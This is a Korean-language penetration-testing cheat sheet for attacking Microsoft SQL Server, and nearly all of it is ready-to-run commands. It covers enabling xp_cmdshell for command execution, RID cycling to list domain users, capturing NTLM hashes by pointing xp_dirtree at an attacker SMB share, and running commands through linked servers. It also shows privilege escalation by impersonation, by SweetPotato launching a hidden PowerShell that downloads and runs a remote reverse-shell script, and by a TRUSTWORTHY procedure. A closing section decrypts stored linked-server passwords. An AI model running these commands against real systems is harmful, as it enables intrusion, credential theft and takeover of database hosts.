1433 - mssql

MSSQL(Microsoft SQL Server)는 마이크로소프트에서 개발한 관계형 데이터베이스입니다. 다른 데이터베이스 서비스와 다르게 Windows 사용자 계정이나 AD 계정으로 인증이 가능한 통합 인증 모드를 지원합니다.

XP_CMDSHELL

xp_cmdshell은 사용자가 SQL 콘솔에서 해당 SQL 서비스가 실행되는 Windows 시스템에 원격으로 명령을 실행할 수 있도록 지원하는 프로시저입니다.

이 기능은 기본적으로 비활성화 상태이며 활성화와 실행에는 각각 sysadmin 권한이 필요합니다.

# 활성화 여부 확인
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

# XP_CMDSHELL 프로시저 활성화 및 저장
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# 원격 명령 실행
EXEC xp_cmdshell 'whoami';

# XP_CMDSHELL 프로시저 비활성화 및 저장
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'Show Advanced Options', 0; RECONFIGURE;

RID Cycling

mssql 내장 함수 중 SUSER_SID는 NetBIOS를 포함한 도메인 계정 이름을 입력했을 때 SID를 반환하며, SUSER_SNAME은 SID를 입력했을 때 계정 이름을 반환합니다.

SUSER_SID 함수는 mssql 서버에 등록된 도메인 계정에 한해서만 조회 가능합니다.

이 두가지 함수를 이용하여 mssql 연결이 가능한 상태에서 도메인 객체의 sid 조회를 통해 RID Cycling 공격으로 연계가 가능합니다.

# mssql에 등록된 도메인 계정을 통해 도메인 SID 획득
SELECT sys.fn_varbintohexstr(SUSER_SID('contoso\Administrator'))

# python으로 코드 제작 후 파일로 저장
for i in range(500, 10000 + 1, 1):
    print(f"select (SUSER_SNAME(SID_BINARY(N'<SID>-{i}')))")
    
# impacket의 file 플래그를 사용하여 쿼리 자동 삽입 후 도메인 유저 결과 저장
impacket-mssqlclient contoso/sa:'Password123!' -file rids.txt | tee result.txt

# result.txt에서 유효한 도메인 유저 목록만 추출
cat result.txt | grep --text -i contoso | cut -d '\' -f 2 > DomainUsers.txt

NTLM 탈취

xp_dirtree는 mssql 콘솔에서 서버의 시스템 디렉토리를 열거할 수 있는 dir 명령입니다. Windows는 공유 폴더에 접근 시 자동으로 현재 세션으로 ntlm 인증을 하기 때문에 xp_dirtree를 이용하여 대상의 ntlm 챌린지를 탈취하고 이를 크랙할 수 있습니다.

# ntlm 탈취를 위한 smb 서버 실행
impacket-smbserver share . -smb2support

# xp_dirtree를 이용하여 공격자 smb 서버 열거
xp_dirtree \\192.168.1.23\share

Linked Server

mssql은 다른 SQL 서버와 연결을 통해 원격 쿼리 및 명령 실행을 지원합니다. 원격 쿼리 및 명령을 실행할 때 최종 권한 검증은 목적지 서버를 실행하는 주체로부터 발생합니다.

따라서 출발지 서버인 A 서버에서 xp_cmdshell 실행 권한이 없는 일반 사용자 계정이라 하더라도 sa 권한으로 실행되는 B 서버에 대한 원격 쿼리를 통해 xp_cmdshell 실행이 가능합니다.

# mssql과 연결된 링크 서버 목록 열거
EXEC sp_linkedservers;

# 링크 서버에 대한 원격 쿼리 실행
SELECT * FROM OPENQUERY("LinkedServer-CONTOSO", 'select @@servername');

# 링크 서버의 xp_cmdshell 프로시저 활성화 및 저장
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [LinkedServer-CONTOSO]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [LinkedServer-CONTOSO]

# 프로시저가 사용 가능하도록 rpc 활성화
EXEC sp_serveroption N'LinkedServer-CONTOSO', 'rpc','true';
EXEC sp_serveroption N'LinkedServer-CONTOSO', 'rpc out','true';

# 링크 서버로의 원격 명령 실행
EXEC('xp_cmdshell ''whoami''') AT [LinkedServer-CONTOSO]

User Impersonation

관리자가 명시적으로 각 사용자에게 특정 사용자의 권한을 위임받을 수 있는 객체를 설정했다면, 공격자는 해당 세션에서 설정된 위임 구성을 통해 다른 사용자의 권한으로 활동할 수 있습니다.

# 가장 권한을 위임받은 객체 목록 열거
SELECT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';

# 위임받은 객체의 권한을 가장
EXECUTE AS LOGIN = 'sa';

# 원래 사용자 세션으로 복귀
REVERT;

SeImpersonatePrivilege

최신 mssql 설치 시 기본적으로 서비스는 SeImpersonatePrivilege 권한을 가진 NT Service/MSSQLSERVER로 실행됩니다.

공격자는 이 사용자 권한을 이용한 로컬 권한 상승 기법으로 시스템 권한 탈취가 가능합니다.

# 페이로드 주소를 Base64 인코딩
$str = 'IEX ((new-object net.webclient).downloadstring("http://wiki.com/reverse"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Base64 인코딩 된 스크립트를 삽입하여 System 권한으로 실행
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <Base64 Encoded Command>"

TRUSTWORTHY

# 데이터베이스의 TRUSTWORTHY 활성화 여부 확인
SELECT name, is_trustworthy_on  FROM sys.databases;

# 가장할 수 있는 사용자 목록 열거
SELECT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';

# 현재 사용자 / 가장한 사용자 콘솔에서 유저가 TRUSTWORTHY가 활성화된 데이터베이스의 오너인지 확인
SELECT IS_ROLEMEMBER('db_owner');

# vintim 사용자 계정을 가장하여 권한상승 프로시서 생성 및 활성화 후 삭제
CREATE PROCEDURE sp_privesc WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'pentest', 'sysadmin';
EXECUTE sp_privesc;
DROP PROCEDURE sp_privesc;

# pentest 사용자 세션으로 돌아와서 권한 정보 확인
REVERT;
SELECT IS_SRVROLEMEMBER('sysadmin');

# pentest 사용자 권한 되돌리기
EXEC sp_dropsrvrolemember 'ws_dev', 'sysadmin';

TRUSTWORTHY에 대한 자세한 설명은 TRUSTWORTHY를 참고하세요.

Decrypting Linked Server Passwords

# 다른 사용자가 DAC 연결을 수립했는지 점검
SELECT * FROM sys.dm_exec_sessions WHERE endpoint_id = 1

# 연결된 서버와 유저 이름, 암호화된 비밀번호 열거
SELECT sysservers.srvname, syslnklgns.name, syslnklgns.pwdhash FROM master.sys.syslnklgns INNER JOIN master.sys.sysservers ON syslnklgns.srvid = sysservers.srvid WHERE LEN(pwdhash) > 0;

# SMK 열거
SELECT * FROM sys.key_encryptions;

$encryptedData = <Encrypted SMK>;
$encryptedData = $encryptedData.Substring(18); # Remove 0x and padding
$encryptedData = [byte[]] -split ($encryptedData -replace '..', '0x$& ');

$entropy = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL16.MSSQLSERVER\Security" -Name "Entropy").Entropy;

Add-Type -AssemblyName System.Security;
$SMK = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedData, $entropy, 'LocalMachine');
Write-Host (($SMK|ForEach-Object ToString X2) -join '');

# 초기화 벡터 & 암호문 질의
SELECT
	name,
	SUBSTRING(pwdhash, 5, 16) AS 'IV',
	SUBSTRING(pwdhash, 21, LEN(pwdhash) - 20) AS 'Ciphertext'
FROM sys.syslnklgns
WHERE LEN(pwdhash) > 0;